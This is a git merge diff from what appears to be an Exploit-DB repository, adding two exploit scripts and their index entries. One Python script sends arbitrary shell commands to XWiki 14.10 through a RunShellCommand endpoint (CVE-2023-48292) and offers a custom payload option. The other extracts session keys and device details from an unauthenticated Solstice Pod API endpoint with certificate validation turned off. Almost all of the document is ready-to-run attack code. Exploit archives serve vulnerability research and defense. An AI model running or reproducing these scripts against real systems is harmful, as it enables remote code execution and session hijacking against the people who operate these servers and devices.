Merge remote-tracking branch 'exploitdb/main'

exploits/php/webapps/52105.py

@@ -0,0 +1,122 @@
+# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
+# Google Dork: N/A
+# Date: 23 March 2025
+# Exploit Author: Mehran Seifalinia
+# Vendor Homepage: https://www.xwiki.org/
+# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
+# Version: XWiki Standard 14.10
+# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
+# CVE : CVE-2023-48292
+
+from argparse import ArgumentParser
+import sys
+import logging
+from requests import get, post, RequestException
+import validators
+
+# Constants
+CVE_NAME = "CVE-2023-48292"
+HEADERS = {
+    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
+}
+
+# Configure logging
+def setup_logging(logfile):
+    logger = logging.getLogger()
+    logger.setLevel(logging.INFO)
+
+    # Create a logging handler for console output
+    console_handler = logging.StreamHandler(sys.stdout)
+    console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
+    logger.addHandler(console_handler)
+
+    # Create a logging handler for file output
+    file_handler = logging.FileHandler(logfile)
+    file_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
+    logger.addHandler(file_handler)
+
+def validate_url(url):
+    """
+    Validate the URL to ensure it has the correct format and starts with 'http://' or 'https://'.
+    """
+    if not validators.url(url):
+        logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
+        sys.exit(1)
+    return url.rstrip("/")
+
+def check_vulnerability(target_url, method):
+    """
+    Check if the target URL is vulnerable to the CVE-2023-48292 vulnerability.
+    We send a test payload and inspect the response to determine if the vulnerability exists.
+    """
+    try:
+        # Test payload to check for vulnerability
+        test_payload = "echo 'testtesttest1234'"  # Payload to execute a test command on the target system
+        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={test_payload}"
+
+        if method == "GET":
+            response = get(vulnerable_url, headers=HEADERS)
+        else:  # method == "POST"
+            response = post(vulnerable_url, headers=HEADERS)
+
+        if response.status_code == 200 and "testtesttest1234" in response.text:
+            logging.info("Target is vulnerable! Command execution test succeeded.")
+            return True
+        else:
+            logging.info("Target does not appear to be vulnerable.")
+            return False
+    except RequestException as error:
+        logging.error(f"HTTP Request Error: {error}")
+        sys.exit(1)
+
+def perform_attack(target_url, payload, method):
+    """
+    Perform the attack by sending a custom payload to the vulnerable server.
+    """
+    try:
+        logging.info(f"Attempting attack with payload: {payload}")
+        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={payload}"
+
+        if method == "GET":
+            response = get(vulnerable_url, headers=HEADERS)
+        else:  # method == "POST"
+            response = post(vulnerable_url, headers=HEADERS)
+
+        if response.status_code == 200:
+            logging.info(f"Attack successful! Response: {response.text[:100]}...")  # Display a snippet of the response
+        else:
+            logging.warning("Attack attempt failed.")
+    except RequestException as error:
+        logging.error(f"HTTP Request Error: {error}")
+        sys.exit(1)
+
+def main():
+    """
+    Main function to parse command-line arguments, check for vulnerability, and optionally perform the attack.
+    """
+    parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
+    parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
+    parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
+    parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
+    parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
+    parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
+    args = parser.parse_args()
+
+    # Set up logging to file and console
+    setup_logging(args.logfile)
+
+    # Validate the target URL
+    target_url = validate_url(args.target)
+
+    logging.info("Checking the target for vulnerability...")
+    if check_vulnerability(target_url, args.method):
+        if args.exploit:
+            # Perform the attack with the provided payload
+            perform_attack(target_url, args.payload, args.method)
+        else:
+            logging.info("Run with '--exploit' to attempt the attack.")
+    else:
+        logging.warning("The target is not vulnerable. Exiting.")
+
+if __name__ == "__main__":
+    main()

exploits/windows/local/52104.txt

@@ -0,0 +1,88 @@
+# Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint
+# Google Dork: N/A
+# Date: 1/17/2025
+# Exploit Author: The Baldwin School Ethical Hackers
+# Vendor Homepage: https://www.mersive.com/
+# Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html
+# Versions: 5.5, 6.2
+# Tested On: Windows 10, macOS, Linux
+# CVE: N/A
+# Description: This exploit takes advantage of an unauthenticated API endpoint (`/api/config`) on the Solstice Pod, which exposes sensitive information such as the session key, server version, product details, and display name. By accessing this endpoint without authentication, attackers can extract live session information.
+# Notes: This script extracts the session key, server version, product name, product variant, and display name from the Solstice Pod API. It does not require authentication to interact with the vulnerable `/api/config` endpoint.
+# Impact: Unauthorized users can extract session-related information without authentication. The exposed data could potentially lead to further exploitation or unauthorized access.
+
+#!/usr/bin/env python3
+
+import requests
+import ssl
+from requests.adapters import HTTPAdapter
+from urllib3.poolmanager import PoolManager
+
+# Create an adapter to specify the SSL/TLS version and disable hostname verification
+class SSLAdapter(HTTPAdapter):
+    def __init__(self, ssl_context=None, **kwargs):
+        # Set the default context if none is provided
+        if ssl_context is None:
+            ssl_context = ssl.create_default_context()
+            ssl_context.set_ciphers('TLSv1.2')  # Force TLSv1.2 (or adjust to other versions if needed)
+            ssl_context.check_hostname = False  # Disable hostname checking
+            ssl_context.verify_mode = ssl.CERT_NONE  # Disable certificate validation
+        self.ssl_context = ssl_context
+        super().__init__(**kwargs)
+
+    def init_poolmanager(self, *args, **kwargs):
+        kwargs['ssl_context'] = self.ssl_context
+        return super().init_poolmanager(*args, **kwargs)
+
+# Prompt the user for the IP address
+ip_address = input("Please enter the IP address: ")
+
+# Format the URL with the provided IP address
+url = f"https://{ip_address}:8443/api/config"
+
+# Create a session and mount the adapter
+session = requests.Session()
+adapter = SSLAdapter()
+session.mount('https://', adapter)
+
+# Send the request to the IP address
+response = session.get(url, verify=False)  # verify=False to ignore certificate warnings
+
+if response.status_code == 200:
+    # Parse the JSON response
+    data = response.json()
+
+    # Extract the sessionKey, serverVersion, productName, productVariant, and displayName values from the response
+    session_key = data.get("m_authenticationCuration", {}).get("sessionKey")
+    server_version = data.get("m_serverVersion")
+    product_name = data.get("m_productName")
+    product_variant = data.get("m_productVariant")
+    display_name = data.get("m_displayInformation", {}).get("m_displayName")
+
+    # Print the extracted values
+    if session_key:
+        print(f"Session Key: {session_key}")
+    else:
+        print("sessionKey not found in the response.")
+
+    if server_version:
+        print(f"Server Version: {server_version}")
+    else:
+        print("serverVersion not found in the response.")
+
+    if product_name:
+        print(f"Product Name: {product_name}")
+    else:
+        print("productName not found in the response.")
+
+    if product_variant:
+        print(f"Product Variant: {product_variant}")
+    else:
+        print("productVariant not found in the response.")
+
+    if display_name:
+        print(f"Display Name: {display_name}")
+    else:
+        print("displayName not found in the response.")
+else:
+    print(f"Failed to retrieve data. HTTP Status code: {response.status_code}")

files_exploits.csv

@@ -34590,6 +34590,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40010,exploits/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,webapps,php,80,2016-06-23,2016-06-23,0,,,,,http://www.exploit-db.comFileSharing-master.zip,
 40009,exploits/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,webapps,php,80,2016-06-23,2016-06-23,0,,,,,http://www.exploit-db.comFileSharing-master.zip,
 20856,exploits/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",webapps,php,,2012-08-27,2012-08-27,1,OSVDB-85947,,,,,
+52105,exploits/php/webapps/52105.py,"XWiki Standard 14.10 - Remote Code Execution (RCE)",2025-03-29,"Mehran Seifalinia",webapps,php,,2025-03-29,2025-03-29,0,CVE-2023-48292,,,,,
 42727,exploits/php/webapps/42727.txt,"XYZ Auto Classifieds 1.0 - SQL Injection",2017-09-12,8bitsec,webapps,php,,2017-09-15,2017-09-15,0,,,,,,
 4794,exploits/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,webapps,php,,2007-12-25,,1,OSVDB-39741;CVE-2007-6567;OSVDB-39740;CVE-2007-6566,,,,,
 4795,exploits/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,webapps,php,,2007-12-25,,1,OSVDB-39742;CVE-2007-6568,,,,,
@@ -41775,6 +41776,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40393,exploits/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",local,windows,,2016-09-19,2016-09-19,0,,,,,,
 52064,exploits/windows/local/52064.txt,"SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,,2020-05-11,2020-05-12,0,CVE-2020-12608,,,,,
+52104,exploits/windows/local/52104.txt,"Solstice Pod 6.2 - API Session Key Extraction via API Endpoint",2025-03-29,"Thomas Heverin",local,windows,,2025-03-29,2025-03-29,0,,,,,,
 11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows,,2010-01-21,,1,OSVDB-64368,,,,http://www.exploit-db.comsompl1_0.rar,
 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,,2020-07-17,2020-07-17,0,,,,,,
 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path",2021-08-17,shinnai,local,windows,,2021-08-17,2021-08-17,0,CVE-2020-5147,,,,,